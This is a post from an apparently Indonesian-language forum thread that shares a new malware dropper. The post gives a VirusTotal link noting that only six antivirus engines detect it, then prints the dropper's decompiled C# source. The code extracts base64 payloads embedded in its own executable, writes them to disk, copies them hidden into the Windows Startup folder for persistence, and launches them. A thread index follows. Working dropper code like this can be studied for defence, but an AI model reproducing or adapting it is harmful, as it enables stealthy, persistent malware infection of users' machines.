[Info] New Malware - Auto Task
#19
https://www.virustotal.com/en/file/4eec4.../analysis/

itu hasil Scan dari dropper virus ini xD , cuman 6 antivirus yang mendeteksi

Code:
[MethodImpl(MethodImplOptions.NoInlining)]
private static void Method4()
{
    string text = File.ReadAllText(Process.GetCurrentProcess().MainModule.FileName);
    string text2 = "<description>";
    string text3 = "</description>";
    string expression = Class2.Method1(Class3.Method3(ref text, ref text2, ref text3));
    Class3.Field1 = Strings.Split(expression, "\\\\", -1, CompareMethod.Binary);
    for (int i = 0; i <= Class3.Field1.Length - 1; i++)
    {
        if (!string.IsNullOrEmpty(Class3.Field1[i]))
        {
            try
            {
                string[] array = Strings.Split(Class3.Field1[i], "||", -1, CompareMethod.Binary);
                string s = array[0];
                string text4 = Interaction.Environ(array[1]) + "\\" + array[2];
                string a = array[3];
                string a2 = array[4];
                int millisecondsTimeout = Convert.ToInt32(array[5]) * 1000;
                if (File.Exists(text4))
                {
                    File.Delete(text4);
                }
                File.WriteAllBytes(text4, Class3.Method1(Convert.FromBase64String(s)));
                if (a2 == "True")
                {
                    string text5 = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + array[2];
                    if (File.Exists(text5))
                    {
                        File.Delete(text5);
                    }
                    File.Copy(text4, text5);
                    File.SetAttributes(text5, FileAttributes.Hidden);
                }
                Thread.Sleep(millisecondsTimeout);
                if (a == "Yes")
                {
                    Process.Start(text4);
                }
            }
            catch (Exception ex)
            {
                MessageBox.Show(ex.ToString());
            }
        }
    }
    Process.GetCurrentProcess().Kill();
}


Messages In This Thread
New Malware - Auto Task - by abdilahrf - 11-18-2014, 10:41 AM
RE: New Malware - Auto Task - by abdilahrf - 11-18-2014, 10:43 AM
RE: New Malware - Auto Task - by m3t4b3t4 - 11-18-2014, 10:54 AM
RE: New Malware - Auto Task - by abdilahrf - 11-18-2014, 11:13 AM
RE: New Malware - Auto Task - by Devonz - 11-18-2014, 11:30 AM
RE: New Malware - Auto Task - by Shadow_ - 11-20-2014, 11:20 PM
RE: New Malware - Auto Task - by Kresna - 11-18-2014, 02:03 PM
RE: New Malware - Auto Task - by cyberking - 11-18-2014, 04:04 PM
RE: New Malware - Auto Task - by rocketsid - 11-18-2014, 05:27 PM
RE: New Malware - Auto Task - by abdilahrf - 11-18-2014, 06:51 PM
RE: New Malware - Auto Task - by dunkenciels - 11-18-2014, 08:57 PM
RE: New Malware - Auto Task - by hamdan_zenith - 11-18-2014, 09:18 PM
RE: New Malware - Auto Task - by jufianto - 11-18-2014, 10:13 PM
RE: New Malware - Auto Task - by wine trochanter - 11-18-2014, 10:48 PM
RE: New Malware - Auto Task - by abdilahrf - 11-19-2014, 12:30 AM
RE: New Malware - Auto Task - by abdilahrf - 11-20-2014, 11:42 PM
RE: New Malware - Auto Task - by Mimin - 11-21-2014, 02:45 PM
RE: New Malware - Auto Task - by devilscream - 11-23-2014, 01:45 AM
RE: New Malware - Auto Task - by bre-ann - 10-21-2015, 11:18 AM
RE: New Malware - Auto Task - by badwolves1986 - 10-22-2015, 10:47 PM




Users browsing this thread: 1 Guest(s)